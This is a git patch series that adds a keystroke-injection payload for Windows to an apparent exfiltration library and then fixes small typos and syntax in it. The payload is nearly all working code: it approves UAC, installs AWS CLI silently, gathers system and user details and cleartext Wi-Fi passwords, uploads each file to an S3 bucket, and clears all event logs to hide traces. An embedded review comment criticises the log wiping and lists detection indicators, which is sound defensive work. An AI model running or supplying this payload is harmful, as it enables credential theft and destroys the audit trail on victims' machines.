From 1fa5da87dd694c00be2d92461f67900c385928fb Mon Sep 17 00:00:00 2001
From: PacManPwn <authokey@proton.me>
Date: Sun, 27 Oct 2024 13:28:46 -0400
Subject: [PATCH 1/5] Create PwnedBy_AWS

Educational and penetration testing purposes only. This script is designed to demonstrate that once physical access is gained, a malicious actor can easily enumerate information and credentials, and have that remotely exfiltrated for later review, exploitation, and/or selling. Please use responsibly, and ensure you are only targeting systems that you have explicit permission to test on.
---
 payloads/library/exfiltration/PwnedBy_AWS | 151 ++++++++++++++++++++++
 1 file changed, 151 insertions(+)
 create mode 100644 payloads/library/exfiltration/PwnedBy_AWS

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
new file mode 100644
index 00000000..8b440706
--- /dev/null
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -0,0 +1,151 @@
+REM Title: Pwned by AWS
+REM Description: System enum and extract to your Amazon Server.
+REM Author: PacManPwn\
+REM Target: Windows 11/10
+
+DELAY 1000
+REM Open the run dialog
+GUI r
+DELAY 500
+
+REM Launch Admin Powershell
+STRING pwsh 
+DELAY 500
+CTRL-SHIFT ENTER
+DELAY 2000
+
+REM Approve User Access Control
+ALT y
+DELAY 2000
+
+REM Install AWS CLI in silent mode (no set-up prompts)
+STRING msiexec.exe /i https://awscli.amazonaws.com/AWSCLIV2.msi /quiet /norestart
+DELAY 500
+ENTER
+
+REM Added extra delay to ensure AWS CLI installation is complete
+DELAY 1500 
+
+REM Verify the AWS CLI is available. If not, exit the script.
+STRING if (!(Get-Command aws -ErrorAction SilentlyContinue)) { Write-Output "AWS CLI not found. Exiting."; exit }
+ENTER
+
+REM Match timezone to your AWS default region
+STRING Set-TimeZone -Id "MATCH-TIMEZONE-TO-AWS-BUCKET"
+ENTER
+
+REM Sync to a reliable NTP server for accurate system time
+STRING w32tm /config /manualpeerlist:"pool.ntp.org" /syncfromflags:manual /reliable:YES /update
+ENTER
+DELAY 500
+
+REM Verify your machine's system time is in sync
+STRING w32tm /resync
+ENTER
+DELAY 1000
+
+REM Set AWS CLI Path to the current session (if it's not recognized)
+STRING $env:Path += ";C:\Program Files\Amazon\AWSCLIV2"
+ENTER
+DELAY 1000
+
+REM Set AWS_ACCESS_KEY_ID
+STRING $env:AWS_ACCESS_KEY_ID = "YOUR-ACCESS-KEY-HERE"
+ENTER
+DELAY 500
+
+REM Set AWS SECRET-ACCESS-KEY-HERE
+STRING $env:AWS_SECRET_ACCESS_KEY = "YOUR-SECRET-ACCESS-KEY-HERE"
+ENTER
+DELAY 500
+
+REM Set your AWS default region (i.e. us-east-1)
+STRING $env:AWS_DEFAULT_REGION = "AWS-BUCKET-REGION"
+ENTER
+DELAY 500
+
+REM Create C:\temp\ directory if it doesn't exist for saving collected info
+STRING If (!(Test-Path -Path "C:\temp\")) { New-Item -Path "C:\temp\" -ItemType Directory }
+ENTER
+DELAY 500
+
+REM Enumerate system info and save to a text file
+STRING systeminfo > C:\temp\systeminfo.txt
+ENTER
+DELAY 1000
+
+REM Upload system info to AWS S3 server
+STRING aws s3 cp C:\temp\systeminfo.txt s3://your-aws-bucket-name/systeminfo.txt
+ENTER
+
+REM Enumerate network interfaces and save to a text file
+STRING Get-NetAdapter > C:\temp\netadapter.txt
+ENTER
+DELAY 1000
+
+REM Upload network adapter info to AWS S3 server
+STRING aws s3 cp C:\temp\netadapter.txt s3://your-aws-bucket-name/netadapter.txt
+ENTER
+
+REM Enumerate user info and save to a text file
+STRING whoami > C:\temp\whoami.txt
+ENTER
+DELAY 1000
+
+REM Upload whoami to AWS S3 server
+STRING aws s3 cp C:\temp\whoami.txt s3://your-aws-bucket-name/whoami.txt
+ENTER
+
+REM Enumerate netuser and save to a text file
+STRING net user > C:\temp\netuser.txt
+ENTER
+DELAY 1000
+
+REM Upload user info to AWS S3 server
+STRING aws s3 cp C:\temp\netuser.txt s3://your-aws-bucket-name/netuser.txt
+ENTER
+
+REM Get Operating System details and save to a text file
+STRING Get-WmiObject Win32_OperatingSystem | Select-Object -Property 
+Caption,OSArchitecture,Version > C:\temp\osinfo.txt
+ENTER
+DELAY 1000
+
+REM Upload OS info to AWS S3 server
+STRING aws s3 cp C:\temp\osinfo.txt s3://your-aws-bucket-name/osinfo.txt
+ENTER
+
+REM Enumerate Wi-Fi profiles and save names to a text file in the temp directory
+STRING netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object 
+{ $_.ToString().Split(':')[1].Trim() } > C:\temp\wifi_names.txt
+ENTER
+DELAY 1000
+
+REM Upload Wi-Fi names to AWS S3 server
+STRING aws s3 cp C:\temp\wifi_names.txt s3://your-aws-bucket-name/wifi_names.txt
+ENTER
+
+REM Retrieve passwords for each Wi-Fi profile and save to a text file
+STRING netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $profileName = 
+$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | SelectString 'Key Content' } > C:\temp\wifi_passwords.txt
+ENTER
+DELAY 1000
+
+REM Upload Wi-Fi passwords to AWS S3 server
+STRING aws s3 cp C:\temp\wifi_passwords.txt s3://your-aws-bucket-name/wifi_passwords.txt
+ENTER
+
+REM Delete event logs to clean your tracks
+STRING Get-EventLog -LogName * | ForEach-Object { Clear-EventLog -LogName $_.Log }
+ENTER
+DELAY 2000
+
+REM Exit and close the powershell
+STRING exit
+ENTER
+
+
+REM Lines 63, 58, 63 - Be sure to replace 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_DEFAULT_REGION', with your appropriate AWS credentials.
+REM Line 34 - Replace Timezone ID to match the timezone for your AWS Region
+REM Adjust directory/file names as you wish
+REM Delays are set for test purposes. Adjust the delays as you would like to optimize the script
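Review bot: The `Clear-EventLog` step near the end of the payload wipes every Windows event log on the tested host, which is irreversible, destroys the audit trail the system owner needs to reconstruct the test, and is not mentioned in the `REM Description` header; I would drop that step from a library payload rather than ship it enabled. The header should also declare the other persistent changes the script makes, for example `REM Side effects: installs AWS CLI, changes time zone and NTP peer, leaves C:\temp\*.txt (including cleartext Wi-Fi keys) on disk`, so an operator knows what must be restored and removed after an authorized engagement. The access key and secret are typed into an interactive session on the target, so they should be treated as disclosed to that host and revoked afterwards. For defenders, this sequence is visible as msiexec fetching an MSI from a remote URL in an elevated session, `netsh wlan show profile ... key=clear`, `aws s3 cp` from an interactive shell, and Security event 1102 / System event 104 when the logs are cleared.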

From ebe93c90ae93dac578329a8366b517805193ad9c Mon Sep 17 00:00:00 2001
From: PacManPwn <authokey@proton.me>
Date: Sun, 27 Oct 2024 15:07:15 -0400
Subject: [PATCH 2/5] Updated typo in PwnedBy_AWS

---
 payloads/library/exfiltration/PwnedBy_AWS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
index 8b440706..1081b119 100644
--- a/payloads/library/exfiltration/PwnedBy_AWS
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -145,7 +145,7 @@ STRING exit
 ENTER
 
 
-REM Lines 63, 58, 63 - Be sure to replace 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_DEFAULT_REGION', with your appropriate AWS credentials.
+REM Lines 53, 58, 63 - Be sure to replace 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_DEFAULT_REGION', with your appropriate AWS credentials.
 REM Line 34 - Replace Timezone ID to match the timezone for your AWS Region
 REM Adjust directory/file names as you wish
 REM Delays are set for test purposes. Adjust the delays as you would like to optimize the script

From e7961c6677640284c0ef5c5ae5b5abb8ec1df054 Mon Sep 17 00:00:00 2001
From: crackingsh3llz <authokey@proton.me>
Date: Tue, 29 Oct 2024 18:37:14 -0400
Subject: [PATCH 3/5] Update PwnedBy_AWS

---
 payloads/library/exfiltration/PwnedBy_AWS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
index 1081b119..f5745991 100644
--- a/payloads/library/exfiltration/PwnedBy_AWS
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -1,6 +1,6 @@
 REM Title: Pwned by AWS
 REM Description: System enum and extract to your Amazon Server.
-REM Author: PacManPwn\
+REM Author: crackingsh3llz\
 REM Target: Windows 11/10
 
 DELAY 1000

From ca80a741fb9c87feca0c289e5f932044795a684d Mon Sep 17 00:00:00 2001
From: crackingsh3llz <authokey@proton.me>
Date: Wed, 30 Oct 2024 09:30:10 -0400
Subject: [PATCH 4/5] Update PwnedBy_AWS

Syntax correction
---
 payloads/library/exfiltration/PwnedBy_AWS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
index f5745991..625f6977 100644
--- a/payloads/library/exfiltration/PwnedBy_AWS
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -127,7 +127,7 @@ ENTER
 
 REM Retrieve passwords for each Wi-Fi profile and save to a text file
 STRING netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $profileName = 
-$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | SelectString 'Key Content' } > C:\temp\wifi_passwords.txt
+$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | Select-String 'Key Content' } > C:\temp\wifi_passwords.txt
 ENTER
 DELAY 1000
 

From 70d676d3af813c3ab9caee7eb9cb7d10fc09d8a0 Mon Sep 17 00:00:00 2001
From: crackingsh3llz <authokey@proton.me>
Date: Wed, 30 Oct 2024 21:33:49 -0700
Subject: [PATCH 5/5] Update PwnedBy_AWS

---
 payloads/library/exfiltration/PwnedBy_AWS | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/exfiltration/PwnedBy_AWS b/payloads/library/exfiltration/PwnedBy_AWS
index 625f6977..3f51db69 100644
--- a/payloads/library/exfiltration/PwnedBy_AWS
+++ b/payloads/library/exfiltration/PwnedBy_AWS
@@ -9,7 +9,7 @@ GUI r
 DELAY 500
 
 REM Launch Admin Powershell
-STRING pwsh 
+STRING powershell 
 DELAY 500
 CTRL-SHIFT ENTER
 DELAY 2000